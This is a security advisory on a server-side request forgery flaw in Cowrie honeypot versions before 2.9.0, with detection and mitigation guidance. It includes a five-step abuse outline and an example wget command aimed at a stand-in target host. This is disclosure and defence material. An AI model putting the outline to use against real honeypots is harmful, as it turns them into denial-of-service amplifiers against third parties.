Source: disclosure@vulncheck.com
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Cowrie honeypot versions prior to 2.9.0 are vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, allowing attackers to leverage the honeypot to launch denial-of-service (DoS) attacks against arbitrary targets. Attackers can exploit the emulated wget and curl commands within the honeypot's shell to generate unbounded HTTP traffic, masking their origin and amplifying the attack's impact.
Step 1: Access Cowrie Honeypot: The attacker gains access to the Cowrie honeypot, typically through SSH or another supported protocol.
Step 2: Command Injection: The attacker interacts with the emulated shell and crafts a command using wget or curl with a malicious URL as an argument, e.g., wget http://target.example.com/.
Step 3: Outbound Request Trigger: The emulated wget or curl command, lacking input validation, executes a real HTTP request to the attacker-specified target URL.
Step 4: Repeated Exploitation: The attacker repeats Step 2 and Step 3, potentially using scripting or automation, to send a large number of requests to the target.
Step 5: Amplification and DoS: The honeypot, acting as an intermediary, generates a significant volume of traffic towards the target, effectively launching a DoS attack while masking the attacker's IP address.
The vulnerability stems from a lack of input validation and rate limiting within Cowrie's emulated wget and curl command implementations. Specifically, the code does not sanitize user-supplied URLs passed as arguments to these commands. When a user provides a malicious URL, the emulated commands execute a real outbound HTTP request to the specified destination. Because no rate limiting is in place, an attacker can repeatedly invoke these commands, triggering numerous outbound requests. This allows the attacker to use the honeypot as an amplification node, directing a flood of traffic towards a target. The root cause is a failure to properly validate and restrict the destination URLs, combined with the absence of request throttling. This flaw allows for uncontrolled outbound requests, enabling the SSRF and DoS amplification.
While no specific APTs are directly linked to this vulnerability at this time, any actor seeking to launch DoS attacks could leverage this. The ease of exploitation makes it attractive to a wide range of attackers. This vulnerability is not currently listed in the CISA KEV catalog, but it is a candidate for inclusion if exploited in the wild.
Monitor outbound network traffic from Cowrie honeypot instances for unusual patterns, such as a high volume of requests to a single external IP address or a small set of IPs.
Analyze Cowrie logs for suspicious wget or curl command invocations, particularly those with unusual or external URLs.
Implement network intrusion detection systems (IDS) with rules to identify and alert on repeated HTTP requests originating from the honeypot to external targets.
Monitor for abnormally high CPU or network utilization on the Cowrie honeypot, which could indicate exploitation.
Review Cowrie configuration files for any unauthorized modifications or changes to the emulated shell environment.
Upgrade Cowrie to version 2.9.0 or later.
Implement input validation to sanitize and restrict the URLs accepted by the emulated wget and curl commands. This could involve whitelisting allowed domains or URL patterns.
Introduce rate limiting for outbound HTTP requests originating from the emulated shell. This will limit the number of requests per time unit.
Consider disabling or restricting the use of wget and curl within the emulated shell if they are not essential for the honeypot's functionality.
Regularly review and audit the Cowrie configuration for any unauthorized changes.
Implement a web application firewall (WAF) in front of the honeypot to filter malicious requests.